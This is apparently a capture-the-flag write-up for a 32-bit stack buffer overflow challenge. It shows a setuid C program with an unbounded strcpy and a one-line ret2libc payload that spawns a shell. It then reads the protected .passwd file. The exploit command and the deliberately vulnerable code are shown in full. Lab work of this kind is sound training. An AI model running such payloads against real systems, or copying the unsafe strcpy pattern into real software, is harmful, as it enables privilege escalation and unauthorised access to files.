ELF x86: Stack buffer overflow basic 6
Environment configuration:
PIE Position Independent Executable No
RelRO Read Only relocations No
NX Non-Executable Stack Yes
ASLR Address Space Layout Randomization No
SF Source Fortification No
SSP Stack-Smashing Protection No
SRC Source code access Yes
Source code:
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
int main (int argc, char ** argv){
char message[20];
if (argc != 2){
printf ("Usage: %s <message>\n", argv[0]);
return -1;
}
setreuid(geteuid(), geteuid());
strcpy (message, argv[1]);
printf ("Your message: %s\n", message);
return 0;
}
app-systeme-ch33@challenge02:~$ ./ch33 `python -c "print 'A'*32 + '\x10\x33\xe6\xb7' + 'DDDD' + '\x4c\x5d\xf8\xb7'"`
Your message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�3��DDDDL]��
$ cat .passwd